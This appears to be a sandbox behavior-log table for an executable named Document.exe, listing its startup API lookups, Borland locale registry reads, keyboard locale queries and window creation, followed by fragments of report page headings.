Category	Operation	Information	Count	Logfile
Module	Get Handle	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, base_address = 0x400000	1	Fn
Keyboard	Get Info	type = 0, result_out = 4	1	Fn
System	Get Info	type = Operating System	2	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 261	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Borland\Locales	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.ENU, base_address = 0x0	1	Fn
Module	Load	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, base_address = 0x0	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x764a0000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\kernel32.dll, function = GetDiskFreeSpaceExA, address_out = 0x7653434f	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x76640000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VariantChangeTypeEx, address_out = 0x76644c28	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x766bc802	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x766bec66	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x76665934	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x766bd332	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x766bdbd4	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x766be405	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x766bf00a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x766bf15e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x76665a98	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x766becfa	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x766bee2e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x7665b0dc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarI4FromStr, address_out = 0x76656fab	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromStr, address_out = 0x766601a0	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarR8FromStr, address_out = 0x7665699e	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromStr, address_out = 0x76666ba7	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyFromStr, address_out = 0x76686c12	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBoolFromStr, address_out = 0x7665dbd1	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromCy, address_out = 0x76667fdc	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromDate, address_out = 0x76657a2a	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrFromBool, address_out = 0x76660355	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76130000	1	Fn
System	Get Info	type = Operating System	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x76154413	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x76147d2f	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x7615451a	1	Fn
Module	Get Filename	module_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 256	1	Fn
Window	Create	window_name = Document, class_name = TApplication, wndproc_parameter = 0	1	Fn
Window	Set Attribute	window_name = Document, class_name = TApplication, index = 18446744073709551612, new_long = 2494447	1	Fn
Keyboard	Get Info	type = KB_LOCALE_ID	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76130000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = AnimateWindow, address_out = 0x7615b531	1	Fn
Module	Get Handle	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, base_address = 0x73b80000	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = InitializeFlatSB, address_out = 0x73bb266f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = UninitializeFlatSB, address_out = 0x73bb2542	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollProp, address_out = 0x73bb1d29	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollProp, address_out = 0x73bb238d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_EnableScrollBar, address_out = 0x73bb20c9	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_ShowScrollBar, address_out = 0x73bb1fdb	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollRange, address_out = 0x73bb1e8d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollInfo, address_out = 0x73bb1f0f	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_GetScrollPos, address_out = 0x73bb1ccd	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollPos, address_out = 0x73bb216d	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollInfo, address_out = 0x73bb22be	1	Fn
Module	Get Address	module_name = c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll, function = FlatSB_SetScrollRange, address_out = 0x73bb21e2	1	Fn
Module	Get Handle	module_name = c:\windows\syswow64\user32.dll, base_address = 0x76130000	1	Fn
Module	Get Address	module_name = c:\windows\syswow64\user32.dll, function = SetLayeredWindowAttributes, address_out = 0x7616ec88	1	Fn
Module	Get Filename	module_name = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.EN, process_name = c:\users\aetadzjz\appdata\roaming\document\document.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\DOCUMENT\Document.exe, size = 255	1	Fn

Notifications (2/2)

Monitored Processes

Behavior Information - Sequential View

Before

After